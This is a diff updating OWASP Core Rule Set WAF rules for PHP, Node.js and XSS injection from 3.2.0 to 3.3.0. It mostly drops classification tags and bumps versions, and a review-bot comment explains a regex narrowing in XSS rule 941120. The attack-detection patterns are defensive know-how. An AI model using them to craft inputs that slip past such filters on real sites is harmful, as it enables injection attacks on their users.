 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -504,10 +484,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'attack-injection-php',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -548,11 +526,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'platform-multi',\
 tag:'attack-injection-php',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 tag:'paranoia-level/2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule MATCHED_VARS "@pm (" \
@@ -603,11 +579,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-injection-php',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 tag:'paranoia-level/3',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -650,11 +624,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'platform-multi',\
 tag:'attack-injection-php',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 tag:'paranoia-level/3',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -694,11 +666,9 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
 tag:'platform-multi',\
 tag:'attack-injection-php',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 tag:'paranoia-level/3',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -725,11 +695,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-injection-php',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 tag:'paranoia-level/3',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf b/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf
index 0aef3a9fa..30ecd79bd 100644
--- a/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf
+++ b/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -59,10 +59,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-rce',\
 tag:'attack-injection-nodejs',\
 tag:'paranoia-level/1',\
- tag:'OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 multiMatch,\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
diff --git a/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf
index b904328e2..dab8f0ea0 100644
--- a/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf
+++ b/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -47,14 +47,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -79,14 +73,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -96,7 +84,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 # -=[ XSS Filters - Category 2 ]=-
 # XSS vectors making use of event handlers like onerror, onload etc, e.g.,
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\"'`;\/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]+on[a-zA-Z]+[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\"'`;\/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]+[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=" \
 "id:941120,\
 phase:2,\
 block,\
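Review bot: Dropping the `+` after the leading character class in rule 941120 is behaviour-preserving for an unanchored `@rx` (any match of the old pattern contains a match of the new one starting at its last separator character) and it removes the need to re-scan long runs of separators before each `on` attempt, but nothing in the hunk says so, which invites a later contributor to put the quantifier back. The classes also still list `\x3B` twice each, plus the literal `;` in the first one, which is harmless but suggests the pattern was never tidied; one occurrence of the semicolon per class is enough. A comment above the SecRule such as `# one separator char before 'on' is sufficient for an unanchored match and avoids re-scanning runs of separators` would record the reason for the change. The rule's action list (`id:941120`, `phase:2`, `block`, …) continues past the end of the hunk.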
@@ -110,14 +98,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -145,14 +127,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -176,14 +152,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -216,14 +186,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -246,14 +210,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -277,14 +235,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -309,14 +261,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -336,14 +282,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -363,14 +303,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -390,14 +324,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -417,14 +345,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -444,14 +366,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -471,14 +387,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -498,14 +408,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -525,14 +429,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -552,14 +450,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -579,14 +471,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -606,14 +492,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -638,14 +518,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -670,14 +544,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -717,11 +585,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'OWASP_TOP_10/A7',\
- tag:'CAPEC-63',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -747,11 +612,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:
 tag:'attack-xss',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'OWASP_TOP_10/A7',\
- tag:'CAPEC-63',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -779,15 +641,9 @@ SecRule REQUEST_HEADERS:Referer "@detectXSS" \
 tag:'platform-multi',\
 tag:'attack-xss',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 tag:'paranoia-level/2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -810,15 +666,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'platform-multi',\
 tag:'attack-xss',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A3',\
- tag:'OWASP_AppSensor/IE1',\
- tag:'CAPEC-242',\
 tag:'paranoia-level/2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -898,14 +748,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'platform-multi',\
 tag:'attack-xss',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A2',\
- tag:'OWASP_AppSensor/IE1',\
 tag:'PCI/6.5.1',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -923,14 +768,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'platform-multi',\
 tag:'attack-xss',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A2',\
- tag:'OWASP_AppSensor/IE1',\
 tag:'PCI/6.5.1',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -951,14 +791,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
